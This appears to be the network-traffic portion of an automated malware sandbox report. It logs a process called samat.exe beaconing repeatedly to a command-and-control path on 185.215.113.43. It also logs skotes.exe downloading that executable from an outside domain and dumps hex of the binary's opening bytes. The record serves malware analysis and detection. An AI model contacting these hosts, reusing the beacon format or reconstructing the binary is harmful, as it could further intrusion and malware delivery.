                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.091233015 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:50 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    131192.168.2.550177185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:52.835971117 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:54.176927090 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:53 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    132192.168.2.550180185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:58.959685087 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:00.313141108 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:20:00 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    133192.168.2.550182185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:05.139697075 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:06.493705034 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:20:06 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    134192.168.2.550183185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:08.132091999 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:09.536072016 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:20:09 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    135192.168.2.550184185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:11.287513018 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:12.722920895 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:20:12 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    136192.168.2.550185185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:14.352327108 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:15.734050035 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:20:15 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    0192.168.2.549824188.165.52.144434500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:12:11 UTC55OUTGET /samat.exe HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: thedotmediagroup.com
                                                                                                                                                                                                                                                                                    2024-11-21 21:12:12 UTC209INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    content-type: application/x-msdownload
                                                                                                                                                                                                                                                                                    last-modified: Thu, 21 Nov 2024 21:06:24 GMT
                                                                                                                                                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                                                                                                                                                    content-length: 13960143
                                                                                                                                                                                                                                                                                    date: Thu, 21 Nov 2024 21:12:11 GMT
                                                                                                                                                                                                                                                                                    2024-11-21 21:12:12 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6e 3d 90 09 2a 5c fe 5a 2a 5c fe 5a 2a 5c fe 5a 61 24 fd 5b 2d 5c fe 5a 61 24 fb 5b 9e 5c fe 5a 61 24 fa 5b 20 5c fe 5a 3a d8 03 5a 29 5c fe 5a 3a d8 fd 5b 23 5c fe 5a 3a d8 fa 5b 3b 5c fe 5a 3a d8 fb 5b 02 5c fe 5a 61 24 ff 5b 21 5c fe 5a 2a 5c ff 5a b1 5c fe 5a 62 d9 fa 5b 33 5c fe 5a 62 d9 fc 5b 2b 5c fe 5a 52 69 63 68 2a 5c fe 5a 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06
                                                                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$n=*\Z*\Z*\Za$[-\Za$[\Za$[ \Z:Z)\Z:[#\Z:[;\Z:[\Za$[!\Z*\Z\Zb[3\Zb[+\ZRich*\ZPEd
                                                                                                                                                                                                                                                                                    2024-11-21 21:12:12 UTC16384INData Raw: 00 e9 22 03 01 00 ba b0 01 00 00 b9 01 00 00 00 e9 13 03 01 00 ba c8 01 00 00 b9 01 00 00 00 e9 04 03 01 00 33 c0 c3 90 d9 4b 00 00 24 4c 00 00 e8 4b 00 00 24 4c 00 00 f7 4b 00 00 24 4c 00 00 06 4c 00 00 24 4c 00 00 06 4c 00 00 24 4c 00 00 15 4c 00 00 15 4c 00 00 cc cc cc cc cc cc cc cc 48 85 c9 74 22 53 48 83 ec 20 48 8b 05 57 d1 03 00 48 8b d9 ff 15 36 68 02 00 48 8b cb e8 ae 02 01 00 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc 40 53 48 81 ec a0 00 00 00 48 8b 05 a0 93 03 00 48 33 c4 48 89 84 24 90 00 00 00 48 8b 05 d6 d1 03 00 48 8b d9 48 8d 4c 24 60 ff 15 f0 67 02 00 8b 43 14 48 8d 54 24 60 89 84 24 80 00 00 00 48 8d 4c 24 40 8b 43 18 89 84 24 84 00 00 00 48 8b 05 db d0 03 00 c7 44 24 70 01 00 00 00 ff 15 bd 67 02 00 48 8d 4c 24 20 0f 10 00 0f 10 48 10
                                                                                                                                                                                                                                                                                    Data Ascii: "3K$LK$LK$LL$LL$LLLHt"SH HWH6hHH [@SHHH3H$HHHL$`gCHT$`$HL$@C$HD$pgHL$ H
                                                                                                                                                                                                                                                                                    2024-11-21 21:12:12 UTC16384INData Raw: 00 00 ff 15 68 25 02 00 85 c0 74 7c 0f 1f 40 00 83 f8 ff 75 06 ff 15 b5 24 02 00 44 38 b3 60 30 00 00 75 6d 48 8b 93 58 30 00 00 48 8d 4d 80 45 33 c9 89 74 24 20 45 33 c0 ff 15 b1 27 02 00 85 c0 7e 33 48 8d 4d 80 ff 15 b3 27 02 00 48 8d 4d 80 ff 15 a1 27 02 00 48 8b 93 58 30 00 00 48 8d 4d 80 45 33 c9 89 74 24 20 45 33 c0 ff 15 7e 27 02 00 85 c0 7f cd 48 8b 0f ba 64 00 00 00 ff 15 ec 24 02 00 85 c0 75 88 44 38 b3 60 30 00 00 74 41 48 8b 0f ba f4 01 00 00 ff 15 d1 24 02 00 85 c0 0f 84 51 01 00 00 48 8b 0f ba ff ff ff ff ff 15 d3 24 02 00 85 c0 75 06 ff 15 11 24 02 00 48 8b 0f ba ff ff ff ff ff 15 a3 24 02 00 e9 26 01 00 00 44 38 b3 61 30 00 00 0f 85 e1 00 00 00 48 8d 4c 24 78 ff 15 7e 24 02 00 48 8d 4c 24 70 ff 15 6b 24 02 00 66 66 66 0f 1f 84 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: h%t|@u$D8`0umHX0HME3t$ E3'~3HM'HM'HX0HME3t$ E3~'Hd$uD8`0tAH$QH$u$H$&D8a0HL$x~$HL$pk$fff
                                                                                                                                                                                                                                                                                    2024-11-21 21:12:12 UTC16384INData Raw: e8 27 05 00 00 cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 e8 d3 04 00 00 33 c0 48 83 c4 28 c3 48 83 ec 28 e8 e3 06 00 00 e8 52 9f ff ff 8b c8 48 83 c4 28 e9 bb d1 00 00 cc cc cc 48 89 5c 24 08 57 48 83 ec 30 b9 01 00 00 00 e8 bc 01 00 00 84 c0 0f 84 30 01 00 00 40 32 ff 40 88 7c 24 20 e8 6b 01 00 00 8a d8 8b 0d 03 59 03 00 83 f9 01 0f 84 1d 01 00 00 85 c9 75 4a c7 05 ec 58 03 00 01 00 00 00 48 8d 15 a5 e8 01 00 48 8d 0d 5e e8 01 00 e8 85 cb 00 00 85 c0 74 0a b8 ff 00 00 00 e9 d8 00 00 00 48 8d 15 3c e8 01 00 48 8d 0d 25 e8 01 00 e8 20 cb 00 00 c7 05 ae 58 03 00 02 00 00 00 eb 08 40 b7 01 40 88 7c 24 20 8a cb e8 99 02 00 00 e8 3c 04 00 00 48 8b d8 48 83 38 00 74 1e 48 8b c8 e8 eb 01 00 00 84 c0 74 12 45 33 c0 41 8d 50 02 33 c9 48 8b 03 ff 15 b1 e7 01 00
                                                                                                                                                                                                                                                                                    Data Ascii: 'H(3H(H(RH(H\$WH00@2@|$ kYuJXHH^tH<H% X@@|$ <HH8tHtE3AP3H
                                                                                                                                                                                                                                                                                    2024-11-21 21:12:12 UTC16384INData Raw: b7 01 48 89 b5 00 04 00 00 33 c9 e8 38 9d 00 00 40 8a c7 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 b8 ff ff ff ff ff ff ff 3f 48 8b e9 48 3b d0 76 11 41 c6 40 30 01 32 c0 41 c7 40 2c 0c 00 00 00 eb 60 33 ff 48 8d 34 95 00 00 00 00 48 39 b9 08 04 00 00 75 09 48 81 fe 00 04 00 00 76 09 48 3b b1 00 04 00 00 77 04 b0 01 eb 37 48 8b ce e8 6c c9 00 00 48 8b d8 48 85 c0 74 1d 48 8b 8d 08 04 00 00 e8 a4 9c 00 00 48 89 9d 08 04 00 00 40 b7 01 48 89 b5 00 04 00 00 33 c9 e8 8c 9c 00 00 40 8a c7 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 45 8b c8 41 83 e9 02 74 32 41 83 e9 01 74 29 41 83 f9 09 74 23 41 83 f8 0d 74 1d 83 e1 04 41 b8 ef ff 00 00 0f 95 c0 66 83 ea 63
                                                                                                                                                                                                                                                                                    Data Ascii: H38@H\$0Hl$8Ht$@H _H\$Hl$Ht$WH H?HH;vA@02A@,`3H4H9uHvH;w7HlHHtHH@H3@H\$0Hl$8Ht$@H _EAt2At)At#AtAfc
                                                                                                                                                                                                                                                                                    2024-11-21 21:12:12 UTC16384INData Raw: 04 00 00 48 8b 85 70 04 00 00 45 33 e4 4c 89 64 24 50 49 8b d8 44 88 64 24 60 48 8b f2 44 88 64 24 78 4c 8b f9 44 88 65 80 44 88 65 88 48 85 c0 74 05 0f 10 00 eb 10 44 39 25 a6 dd 02 00 75 12 0f 10 05 f1 96 02 00 c6 44 24 78 01 f3 0f 7f 44 24 68 4d 85 c9 75 32 48 8d 44 24 50 c6 45 80 01 48 89 44 24 28 45 33 c9 45 33 c0 4c 89 64 24 20 33 d2 c7 44 24 7c 16 00 00 00 33 c9 e8 93 5b 00 00 83 cf ff e9 45 01 00 00 48 85 db 74 05 48 85 f6 74 c4 4d 8b f7 44 89 64 24 49 66 44 89 64 24 4d 44 88 64 24 4f 48 89 74 24 30 48 89 5c 24 38 4c 89 64 24 40 41 83 e6 02 75 0a 44 88 64 24 48 48 85 f6 75 05 c6 44 24 48 01 48 8d 44 24 50 44 89 65 b0 48 89 45 98 48 8d 4d 90 48 8d 44 24 30 44 88 65 b4 48 89 85 f0 03 00 00 0f 57 c0 48 8b 85 78 04 00 00 48 89 45 a8 4c 89 65 b8 44 89
                                                                                                                                                                                                                                                                                    Data Ascii: HpE3Ld$PIDd$`HDd$xLDeDeHtD9%uD$xD$hMu2HD$PEHD$(E3E3Ld$ 3D$|3[EHtHtMDd$IfDd$MDd$OHt$0H\$8Ld$@AuDd$HHuD$HHD$PDeHEHMHD$0DeHWHxHELeD
                                                                                                                                                                                                                                                                                    2024-11-21 21:12:12 UTC16384INData Raw: 48 83 ec 20 48 8b f2 8b f9 e8 ba 26 00 00 45 33 c9 48 8b d8 48 85 c0 74 1f 48 8b 08 48 8b c1 4c 8d 81 c0 00 00 00 49 3b c8 74 0d 39 38 74 20 48 83 c0 10 49 3b c0 75 f3 33 c0 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 85 c0 74 e4 4c 8b 40 08 4d 85 c0 74 db 49 83 f8 05 75 0a 4c 89 48 08 41 8d 40 fc eb cd 49 83 f8 01 75 05 83 c8 ff eb c2 48 8b 6b 08 48 89 73 08 83 78 04 08 0f 85 c4 00 00 00 48 83 c1 30 48 8d 91 90 00 00 00 eb 08 4c 89 49 08 48 83 c1 10 48 3b ca 75 f3 81 38 8d 00 00 c0 8b 7b 10 74 7a 81 38 8e 00 00 c0 74 6b 81 38 8f 00 00 c0 74 5c 81 38 90 00 00 c0 74 4d 81 38 91 00 00 c0 74 3e 81 38 92 00 00 c0 74 2f 81 38 93 00 00 c0 74 20 81 38 b4 02 00 c0 74 11 81 38 b5 02 00 c0 8b d7 75 40 ba 8d 00 00 00 eb 36 ba 8e 00 00 00 eb 2f
                                                                                                                                                                                                                                                                                    Data Ascii: H H&E3HHtHHLI;t98t HI;u3H\$0Hl$8Ht$@H _HtL@MtIuLHA@IuHkHsxH0HLIHH;u8{tz8tk8t\8tM8t>8t/8t 8t8u@6/
                                                                                                                                                                                                                                                                                    2024-11-21 21:12:12 UTC16384INData Raw: eb 08 ff 15 c8 e4 00 00 89 07 48 8b c7 48 8b 8c 24 40 14 00 00 48 33 cc e8 33 f9 fe ff 4c 8d 9c 24 50 14 00 00 49 8b 5b 20 49 8b 6b 30 49 8b e3 41 5e 5f 5e c3 cc cc cc 48 89 5c 24 08 48 89 6c 24 18 56 57 41 54 41 56 41 57 b8 70 14 00 00 e8 fc fb fe ff 48 2b e0 48 8b 05 e2 13 02 00 48 33 c4 48 89 84 24 60 14 00 00 4c 63 d2 48 8b d9 49 8b c2 45 8b f1 48 c1 f8 06 48 8d 0d b0 5d 02 00 41 83 e2 3f 4d 03 f0 4d 8b f8 49 8b f8 48 8b 04 c1 4b 8d 14 d2 4c 8b 64 d0 28 33 c0 48 89 03 4d 3b c6 89 43 08 0f 83 ce 00 00 00 48 8d 44 24 50 49 3b fe 73 2d 0f b7 0f 48 83 c7 02 66 83 f9 0a 75 0c ba 0d 00 00 00 66 89 10 48 83 c0 02 66 89 08 48 83 c0 02 48 8d 8c 24 f8 06 00 00 48 3b c1 72 ce 48 83 64 24 38 00 48 8d 4c 24 50 48 83 64 24 30 00 4c 8d 44 24 50 48 2b c1 c7 44 24 28
                                                                                                                                                                                                                                                                                    Data Ascii: HH$@H33L$PI[ Ik0IA^_^H\$Hl$VWATAVAWpH+HH3H$`LcHIEHH]A?MMIHKLd(3HM;CHD$PI;s-HfufHfHH$H;rHd$8HL$PHd$0LD$PH+D$(
                                                                                                                                                                                                                                                                                    2024-11-21 21:12:12 UTC16384INData Raw: 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 45 33 c9 48 89 74 24 20 45 33 c0 33 d2 33 c9 e8 e1 9c ff ff cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 30 33 f6 8b ea 4c 8b f9 48 85 c9 75 10 e8 bb 42 ff ff c7 00 16 00 00 00 e9 f6 02 00 00 ba 3d 00 00 00 49 8b ff e8 6b c9 fe ff 4c 8b e8 48 85 c0 0f 84 ca 02 00 00 49 3b c7 0f 84 c1 02 00 00 4c 8b 35 37 1d 02 00 4c 3b 35 38 1d 02 00 44 0f b7 60 02 75 12 49 8b ce e8 d5 03 00 00 4c 8b f0 48 89 05 17 1d 02 00 bb 01 00 00 00 4d 85 f6 0f 85 cd 00 00 00 48 8b 05 fa 1c 02 00 85 ed 74 51 48 85 c0 74 4c e8 38 8a ff ff 48 85 c0 75 1e e8 3a 42 ff ff c7 00 16 00 00 00 48 83 cd ff 49 8b cf e8 68 9c ff ff 8b c5 e9 6b 02 00 00 4c 8b 35 ca 1c 02 00 4c 3b 35 cb 1c 02 00 75 7c 49 8b ce e8 6d 03 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: _A^A]A\_^]E3Ht$ E333H\$Hl$Ht$WATAUAVAWH03LHuB=IkLHI;L57L;58D`uILHMHtQHtL8Hu:BHIhkL5L;5u|Im
                                                                                                                                                                                                                                                                                    2024-11-21 21:12:12 UTC16384INData Raw: c0 44 8b d0 45 33 c9 42 8b 8c 8d 74 01 00 00 41 8b c0 49 0f af ca 48 03 c8 4c 8b c1 42 89 8c 8d 74 01 00 00 49 c1 e8 20 45 03 cf 45 3b cc 75 d7 45 85 c0 74 2a 83 bd 70 01 00 00 73 0f 83 39 fd ff ff 8b 85 70 01 00 00 44 89 84 85 74 01 00 00 44 8b a5 70 01 00 00 45 03 e7 e9 1f fd ff ff 44 8b a5 70 01 00 00 e9 1a fd ff ff f7 d9 4c 8d 05 8c b3 fd ff f7 e1 89 4c 24 48 8b c2 c1 e8 03 89 44 24 40 8b d0 89 44 24 34 85 c0 0f 84 95 03 00 00 b9 26 00 00 00 3b d1 8b c2 0f 47 c1 33 d2 89 44 24 50 ff c8 8b f8 41 0f b6 8c 80 32 50 03 00 41 0f b6 b4 80 33 50 03 00 48 8d 1c 8d 00 00 00 00 8d 04 0e 4c 8b c3 48 8d 8d 44 03 00 00 89 85 40 03 00 00 e8 f7 57 00 00 48 8d 0d 20 b3 fd ff 48 c1 e6 02 0f b7 84 b9 30 50 03 00 48 8d 91 20 47 03 00 48 8d 8d 44 03 00 00 4c 8b c6 48 03
                                                                                                                                                                                                                                                                                    Data Ascii: DE3BtAIHLBtI EE;uEt*ps9pDtDpEDpLL$HD$@D$4&;G3D$PA2PA3PHLHD@WH H0PH GHDLH


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    1192.168.2.549978162.159.61.34434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:05 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:05 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:06 UTC247INHTTP/1.1 200 OK
